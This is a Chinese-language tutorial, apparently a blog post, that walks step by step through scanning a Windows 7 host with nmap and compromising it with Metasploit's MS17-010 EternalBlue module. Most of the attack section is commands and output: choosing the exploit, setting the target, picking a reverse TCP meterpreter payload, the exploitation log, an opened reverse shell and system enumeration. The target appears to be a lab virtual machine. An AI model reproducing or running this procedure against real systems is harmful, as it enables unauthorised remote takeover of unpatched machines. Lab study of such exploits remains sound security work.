首先给大家介绍一下两样东西:
然后开始讲解本次的主题。。。。
首先打开Kali(一个著名的渗透测试专用的Linux系统,渗透测试必须的工具)。
然后打开应用程序-漏洞利用工具集-metasploit。
成功后显示如下:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v4.17.3-dev ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
直接利用nmap对10.0.3.65主机进行端口扫描:
msf > nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
结果如下:
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
YoussefdeMacBook-Pro:~ youssef$ sudo nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
Password:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 10:56 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:56
Scanning 10.0.3.65 [1 port]
Completed ARP Ping Scan at 10:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.01s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 10.0.3.65 [65535 ports]
Discovered open port 139/tcp on 10.0.3.65
Discovered open port 135/tcp on 10.0.3.65
Discovered open port 3389/tcp on 10.0.3.65
Discovered open port 445/tcp on 10.0.3.65
Discovered open port 49153/tcp on 10.0.3.65
Discovered open port 49157/tcp on 10.0.3.65
Discovered open port 49152/tcp on 10.0.3.65
Discovered open port 49155/tcp on 10.0.3.65
Discovered open port 49154/tcp on 10.0.3.65
Discovered open port 49156/tcp on 10.0.3.65
Discovered open port 1688/tcp on 10.0.3.65
Completed SYN Stealth Scan at 10:57, 37.66s elapsed (65535 total ports)
Initiating Service scan at 10:57
Scanning 11 services on 10.0.3.65
Service scan Timing: About 36.36% done; ETC: 10:59 (0:01:35 remaining)
Completed Service scan at 10:58, 81.47s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.0.3.65
NSE: Script scanning 10.0.3.65.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Nmap scan report for 10.0.3.65
Host is up (0.0039s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
1688/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 2C:6E:85:8D:C8:C7 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.311 days (since Tue Aug 7 03:30:19 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: WIN-EEGC1ODGIOU; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.04 seconds
Raw packets sent: 66869 (2.943MB) | Rcvd: 65555 (2.623MB)
发现该主机是Windows7系统,并且开放了445端口,那么就有极大概率可以利用ms17_010_eternalblue漏洞了。如果发现主机不是win7或者没有开放该端口,那么本次实验就到此为止。。(꒪ꇴ꒪(꒪ꇴ꒪ ;)哈?
接下来,首先利用改漏洞,输入:
msf > use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue漏洞
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65
rhost => 10.0.3.65 //设置攻击目标
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用meterpreter,这个是好东西,可以提供很多有意思的功能,不设置也可以,不设置的话就是直接获取到windows的cmd
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > run //开始攻击
显示结果如下:
[*] Started reverse TCP handler on 10.0.3.215:4444
[*] 10.0.3.65:445 - Connecting to target for exploitation.
[+] 10.0.3.65:445 - Connection established for exploitation.
[+] 10.0.3.65:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.3.65:445 - CORE raw buffer dump (42 bytes)
[*] 10.0.3.65:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.0.3.65:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.0.3.65:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.0.3.65:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.3.65:445 - Trying exploit with 17 Groom Allocations.
[*] 10.0.3.65:445 - Sending all but last fragment of exploit packet
[*] 10.0.3.65:445 - Starting non-paged pool grooming
[+] 10.0.3.65:445 - Sending SMBv2 buffers
[+] 10.0.3.65:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.3.65:445 - Sending final SMBv2 buffers.
[*] 10.0.3.65:445 - Sending last fragment of exploit packet!
[*] 10.0.3.65:445 - Receiving response from exploit packet
[+] 10.0.3.65:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.3.65:445 - Sending egg to corrupted connection.
[*] 10.0.3.65:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.0.3.65
[*] Meterpreter session 3 opened (10.0.3.215:4444 -> 10.0.3.65:49162) at 2018-08-07 11:41:05 +0800
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
查看系统信息sysinfo:
meterpreter > sysinfo
Computer : WIN-EEGC1ODGIOU
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
获取命令行shell:
meterpreter > shell
Process 2772 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo
主机名: WIN-EEGC1ODGIOU
OS 名称: Microsoft Windows 7 专业版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立工作站
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00371-OEM-8992671-00524
初始安装日期: 2017/8/25, 16:31:04
系统启动时间: 2018/8/7, 11:59:41
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~1995 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,047 MB
可用的物理内存: 1,542 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用: 3,569 MB
虚拟内存: 使用中: 526 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 1 个修补程序。
[01]: KB976902
网卡: 安装了 1 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接
启用 DHCP: 是
DHCP 服务器: 10.0.3.1
IP 地址
[01]: 10.0.3.65
[02]: fe80::dec:dc90:295b:668c
C:\Windows\system32>
退出:
C:\Windows\system32>exit
exit
meterpreter >
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.0.3.65 - Meterpreter session 5 closed. Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) >
具体的一些命令请参考这篇文章:
http://blog.51cto.com/helloeveryone/1112040